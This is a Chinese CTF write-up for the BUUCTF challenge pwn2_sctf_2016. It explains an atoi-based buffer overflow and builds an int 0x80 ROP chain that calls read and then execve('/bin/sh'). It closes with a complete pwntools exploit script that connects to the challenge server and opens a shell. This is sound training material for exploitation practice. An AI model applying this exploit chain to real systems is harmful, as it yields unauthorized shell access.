本文目的
BUUCTF的PWN的第一页的pwn2_sctf_2016的libc不适用辣,但网上一搜全是libc
然后怎么办嘞,都明摆着有个int 0x80,当然是用啊
所以水一篇
早上中午晚上好
老三样,下载程序,打开ida,拖进去
一眼好几个函数
点开main,跟进vuln
看过get_n的朋友都知道,就跟read函数差不了多少,第一个参数是地址,第二是允许输入的最多字节数
后面又接了个atoi,众所周知(不知道的可以现在知),当atoi读入 ’ -1’ (有个空格)后会转化为……一个好大的数(反正能溢出就对了)
然后就能溢出了
还有个do_thing
看一眼汇编,就是个int 0x80,记下地址0x080484d0
那目标明确,奔着 execve(‘/bin/sh’, 0, 0) 去的
e?x控制
rgg看一眼都有啥,就不用–only了,光是pop和ret显然不够
ROPgadget --binary pwn2_sctf_2016
还挺长,我们挑重点
一堆inc可以用于自增,相当于e?x++
有个ecx*2也拿着,这样ecx通过*2和+1可以到达任何数
这就……没了?!那还玩个毛线,不是还应该有abd才对吗
那就看ida汇编(找呗
这不是有一串嘛,正好eax=0之后就ret,相当于mov eax, 0; ret
edx类似
差个ebx,心心念念的pop它来辣(没想到吧,还有有用滴,pop这么好用,当然是第一个查的啦
差点东西,/bin/sh在哪里
eabcdx都可控,又有个int 0x80,read一下
read调用设置:
- eax = 3,这是32位系统的调用号,64位的是0,参考这里
- ebx = 0
- ecx = 一个可写且可知的地址,比如bss
- edx = len(你要写的东西的长度,/bin/sh为7)
根据上面得到的指令地址
- 可以通过mov和inc控制eax和edx
- ebx不能直接pop给0,不然会被get_n截断,所以先pop给0xffffffff,然后inc一次得到ebx=0
- 对于ecx,现在有*2和+1能用,而*2相当于左移一位,32位系统直接移它个32位必为0,不论ecx的初始值,直接
add ecx, ecx32次得到ecx=0,最后通过*2和+1再结合一点玄学(bushi,当然数学)就可以把ecx设置成一个已知的可写的地址(这里是bss) - 最后int 0x80执行read
pl=b'a'*(0x2c+4)
pl+=p32(mov_eax_0)+p32(inc_eax)*3#set eax=3 to syscall read
pl+=p32(pop_ebx)+p32(0xffffffff)+p32(inc_ebx)#set ebx=0 for read para1
pl+=p32(mov_edx_0)+p32(inc_edx)*7#set edx=7 for read para3 to store '/bin/sh'
pl+=p32(add_ecx_ecx)*32+p32(inc_ecx)*2#set init ecx=2, and the times of add_ecx_ecx is at least 32
pl+=p32(add_ecx_ecx)*8+p32(inc_ecx)+p32(add_ecx_ecx)*3+p32(inc_ecx)+p32(add_ecx_ecx)*2+p32(inc_ecx)+p32(add_ecx_ecx)*7+p32(inc_ecx)+p32(add_ecx_ecx)*6#set ecx=0x0804A040(bss addr) for read para2
pl+=p32(int80)#syscall read -> read(0, bss_addr, 7)
execve(系统调用号为11=0xb)
在调用完read之后,eax的值会被改成read读入的字节数(这里是7),所以只需要inc再加4次就有eax=0xb
当然也可以不用管,mov之后再inc到11也是可以的
#eax=7 after sys_read
pl+=p32(inc_eax)*4#set eax=0xb(11) to syscall execve
pl+=p32(pop_ebx)+p32(0x0804A040)#set ebx point at addr of '/bin/sh' for execve para1
pl+=p32(add_ecx_ecx)*32#set ecx=0 for execve para2
pl+=p32(mov_edx_0)#set edx=0 for execve para3
pl+=p32(int80)#syscall execve -> execve('/bin/sh', 0, 0)
最后怎么帅怎么来
- 可以写一个自动写入/bin/sh的一行代码
- 也可以自己从键盘敲,真是太有终端交互辣
完整exp
为什么明明说了不用libc而exp里还有个LibcSearcher呢?(明明说的又不是我说的关我屁事
因为试过了,然后懒得删
from pwn import *
from LibcSearcher import LibcSearcher#context(os='linux', arch='amd64', log_level='debug')
#
context(os='linux', arch='i386', log_level='debug')
#io = process('./pwn2_sctf_2016')
#
io = connect('node5.buuoj.cn',29592)
elf=ELF('./pwn2_sctf_2016')
#gdb.attach(io)def rl():io.recvline()
def ru(s):io.recvuntil(s)
def sl(s):io.sendline(s)
def sd(s):io.send(s)def plt(s):return elf.plt[s]
def got(s):return elf.got[s]ru('read? ')
sl(' -1')ru('data!\n')
int80=0x080484d0inc_eax=0x080484d3
inc_ebx=0x080484d5
inc_ecx=0x080484d7
inc_edx=0x080484d9mov_eax_0=0x08048420
pop_ebx=0x0804835d
add_ecx_ecx=0x0804849a#to control ecx point bss addr
mov_edx_0=0x08048459pl=b'a'*(0x2c+4)
pl+=p32(mov_eax_0)+p32(inc_eax)*3#set eax=3 to syscall read
pl+=p32(pop_ebx)+p32(0xffffffff)+p32(inc_ebx)#set ebx=0 for read para1
pl+=p32(mov_edx_0)+p32(inc_edx)*7#set edx=7 for read para3 to store '/bin/sh'
pl+=p32(add_ecx_ecx)*32+p32(inc_ecx)*2#set init ecx=2, and the times of add_ecx_ecx is at least 32
pl+=p32(add_ecx_ecx)*8+p32(inc_ecx)+p32(add_ecx_ecx)*3+p32(inc_ecx)+p32(add_ecx_ecx)*2+p32(inc_ecx)+p32(add_ecx_ecx)*7+p32(inc_ecx)+p32(add_ecx_ecx)*6#set ecx=0x0804A040(bss addr) for read para2
pl+=p32(int80)#syscall read -> read(0, bss_addr, 7)
#eax=7 after sys_read
pl+=p32(inc_eax)*4#set eax=0xb(11) to syscall execve
pl+=p32(pop_ebx)+p32(0x0804A040)#set ebx point at addr of '/bin/sh' for execve para1
pl+=p32(add_ecx_ecx)*32#set ecx=0 for execve para2
pl+=p32(mov_edx_0)#set edx=0 for execve para3
pl+=p32(int80)#syscall execve -> execve('/bin/sh', 0, 0)
sl(pl)
# 下面两句不要也行,不过要在终端自己先输入/bin/sh(主打一个帅~
sleep(1)
sd('/bin/sh')#write '/bin/sh' to bss#
io.interactive()
